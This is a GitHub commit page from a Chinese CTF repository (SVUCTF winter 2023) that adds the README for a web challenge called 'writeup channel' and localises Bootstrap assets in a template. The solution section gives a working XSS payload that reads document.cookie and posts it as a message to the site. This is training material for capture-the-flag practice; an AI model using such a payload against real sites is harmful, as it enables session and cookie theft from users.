Skip to content

Commit

Permalink
🔀 Merge pull request #12 from SVUCTF/web/writeup_channel
Browse files Browse the repository at this point in the history
  • Loading branch information
13m0n4de committed Dec 14, 2023
2 parents 6c0fdbd + 1f9e40e commit a98727a
Show file tree
Hide file tree
Showing 3 changed files with 33 additions and 7 deletions.
26 changes: 26 additions & 0 deletions challenges/web/writeup_channel/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
# 题解分享频道

- 作者:13m0n4de
- 参考:SVUCTF-WINTER-2023
- 难度:Baby/Trivial/Easy/Normal/Medium/Hard/Expert/Insane
- 分类:Web
- 镜像:[svuctf-winter-2023/writeup_channel](ghcr.io/svuctf/svuctf-winter-2023/writeup_channel:latest)
- 端口:5000

## 题目描述

> **请勿分享自己的链接,或点击其他人分享的链接,以免造成安全问题**
## 题目解析

```html
<script>
var form_data = new FormData();
form_data.append("message", document.cookie);
fetch("/", {
"method": "POST",
"body": form_data,
});
</script>
```

Large diffs are not rendered by default.

Original file line number Diff line number Diff line change
Expand Up @@ -4,13 +4,7 @@
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>SVUCTF-WINTER-2023 解题过程记录</title>

<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet"
integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.0/font/bootstrap-icons.css">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"
integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL"
crossorigin="anonymous"></script>
<link href="{{ url_for('static', filename='css/bootstrap.min.css') }}" rel="stylesheet">
<style>
.background-wrap {
opacity: 0.3;
Expand Down

0 comments on commit a98727a

Please sign in to comment.